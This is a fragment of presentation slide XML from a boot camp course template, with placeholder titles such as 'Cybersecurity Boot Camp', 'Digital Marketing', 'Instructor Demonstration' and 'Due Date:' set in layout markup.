        <p:nvPicPr>
          <p:cNvPr id="1338" name="Google Shape;1338;p10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1339" name="Google Shape;1339;p10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0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Cybersecurity Boot Camp</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1341" name="Google Shape;1341;p104"/>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1342" name="Google Shape;1342;p10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43" name="Google Shape;1343;p10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44" name="Google Shape;1344;p10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1345" name="Google Shape;1345;p104"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807557" y="3072384"/>
            <a:ext cx="6094420" cy="4509867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1346" name="Google Shape;1346;p10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47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1348" name="Google Shape;1348;p10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1349" name="Google Shape;1349;p10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0" name="Google Shape;1350;p105"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1351" name="Google Shape;1351;p105"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807557" y="3181867"/>
            <a:ext cx="6094420" cy="4509867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1352" name="Google Shape;1352;p10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Data Analytics and Visualization</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1353" name="Google Shape;1353;p10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54" name="Google Shape;1354;p10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55" name="Google Shape;1355;p10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sp>
        <p:nvSpPr>
          <p:cNvPr id="1356" name="Google Shape;1356;p10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57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1358" name="Google Shape;1358;p106"/>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9" name="Google Shape;1359;p106"/>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60" name="Google Shape;1360;p106"/>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61" name="Google Shape;1361;p106"/>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62" name="Google Shape;1362;p10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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1364" name="Google Shape;1364;p107"/>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5" name="Google Shape;1365;p107"/>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000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>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66" name="Google Shape;1366;p10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67" name="Google Shape;1367;p10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68"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1369" name="Google Shape;1369;p108"/>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70" name="Google Shape;1370;p108"/>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371" name="Google Shape;1371;p108"/>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372" name="Google Shape;1372;p10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73" name="Google Shape;1373;p108"/>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374" name="Google Shape;1374;p10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75" name="Google Shape;1375;p108"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377701" cy="955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76"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1377" name="Google Shape;1377;p10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78" name="Google Shape;1378;p109"/>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marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="9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379" name="Google Shape;1379;p109"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="138" r="148"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354260" y="3554200"/>
            <a:ext cx="3656648" cy="5338703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1380" name="Google Shape;1380;p10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81" name="Google Shape;1381;p10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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1383" name="Google Shape;1383;p110"/>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384" name="Google Shape;1384;p110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19595" y="0"/>
            <a:ext cx="24414299"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1385" name="Google Shape;1385;p1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1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87" name="Google Shape;1387;p110"/>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marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="7200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Instructor Demonstration</a:t>
            </a:r>
            <a:endParaRPr sz="7200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1388" name="Google Shape;1388;p11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389" name="Google Shape;1389;p110"/>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90" name="Google Shape;1390;p110"/>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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1392" name="Google Shape;1392;p111"/>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393" name="Google Shape;1393;p11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94" name="Google Shape;1394;p111"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1395" name="Google Shape;1395;p11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96" name="Google Shape;1396;p111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19595" y="0"/>
            <a:ext cx="24414299"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1397" name="Google Shape;1397;p111"/>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398" name="Google Shape;1398;p11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99" name="Google Shape;1399;p111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="10515267"/>
            <a:ext cx="20417099"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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1400" name="Google Shape;1400;p1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01" name="Google Shape;1401;p11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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1403" name="Google Shape;1403;p112"/>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04" name="Google Shape;1404;p11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05" name="Google Shape;1405;p112"/>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406" name="Google Shape;1406;p112"/>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07" name="Google Shape;1407;p112"/>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08" name="Google Shape;1408;p112"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377701"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1409" name="Google Shape;1409;p112"/>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410" name="Google Shape;1410;p112"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="12377733"/>
            <a:ext cx="24443101"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11" name="Google Shape;1411;p11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96"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97" name="Google Shape;97;p3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98" name="Google Shape;98;p3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 name="Google Shape;99;p34"/>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100" name="Google Shape;100;p3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Digital Marketing</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p3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3" name="Google Shape;103;p3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sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p3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pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="Google Shape;105;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2278273" y="2817400"/>
            <a:ext cx="5513298" cy="5513298"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1413" name="Google Shape;1413;p113"/>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414" name="Google Shape;1414;p11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5" name="Google Shape;1415;p113"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1416" name="Google Shape;1416;p11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17" name="Google Shape;1417;p113"/>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18" name="Google Shape;1418;p113"/>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19" name="Google Shape;1419;p113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="10515267"/>
            <a:ext cx="20417099"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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1420" name="Google Shape;1420;p11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421" name="Google Shape;1421;p113"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423" name="Google Shape;1423;p114"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="12377733"/>
            <a:ext cx="24443101"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24" name="Google Shape;1424;p11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25" name="Google Shape;1425;p114"/>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426" name="Google Shape;1426;p114"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377701"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427" name="Google Shape;1427;p114"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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28" name="Google Shape;1428;p114"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>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429" name="Google Shape;1429;p114"/>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430" name="Google Shape;1430;p1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431" name="Google Shape;1431;p114"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1433" name="Google Shape;1433;p115"/>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434" name="Google Shape;1434;p115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19595" y="0"/>
            <a:ext cx="24414299"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1435" name="Google Shape;1435;p115"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="208"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2288388" y="2927000"/>
            <a:ext cx="4631755" cy="5280200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1436" name="Google Shape;1436;p11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37" name="Google Shape;1437;p115"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1438" name="Google Shape;1438;p11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39" name="Google Shape;1439;p115"/>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40" name="Google Shape;1440;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="10515267"/>
            <a:ext cx="20417099"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Due Date:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p1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42" name="Google Shape;1442;p115"/>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43"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1444" name="Google Shape;1444;p116"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377701"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445" name="Google Shape;1445;p11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46" name="Google Shape;1446;p116"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1447" name="Google Shape;1447;p116"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="503"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="22013117" y="11202333"/>
            <a:ext cx="1462661" cy="1663773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1448" name="Google Shape;1448;p116"/>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49" name="Google Shape;1449;p116"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>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450" name="Google Shape;1450;p116"/>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451" name="Google Shape;1451;p116"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="12377733"/>
            <a:ext cx="24443101"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52" name="Google Shape;1452;p116"/>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53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1454" name="Google Shape;1454;p117"/>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17"/>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56" name="Google Shape;1456;p117"/>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457" name="Google Shape;1457;p117"/>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458" name="Google Shape;1458;p11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59" name="Google Shape;1459;p117"/>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460" name="Google Shape;1460;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461" name="Google Shape;1461;p117"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="3676879"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1462" name="Google Shape;1462;p11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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1463" name="Google Shape;1463;p117"/>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4" name="Google Shape;1464;p117"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="5943313"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1465" name="Google Shape;1465;p11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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1466" name="Google Shape;1466;p117"/>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7" name="Google Shape;1467;p117"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="8196979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1468" name="Google Shape;1468;p11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1469" name="Google Shape;1469;p117"/>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0" name="Google Shape;1470;p117"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="10463379"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1471" name="Google Shape;1471;p117"/>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1472" name="Google Shape;1472;p117"/>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3" name="Google Shape;1473;p117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="37280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74" name="Google Shape;1474;p117"/>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17"/>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17"/>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17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="5956100"/>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78" name="Google Shape;1478;p117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="82033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79" name="Google Shape;1479;p117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104505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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1481" name="Google Shape;1481;p11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18"/>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83" name="Google Shape;1483;p118"/>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484" name="Google Shape;1484;p118"/>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485" name="Google Shape;1485;p11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86" name="Google Shape;1486;p118"/>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487" name="Google Shape;1487;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488" name="Google Shape;1488;p118"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3467313"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1489" name="Google Shape;1489;p118"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
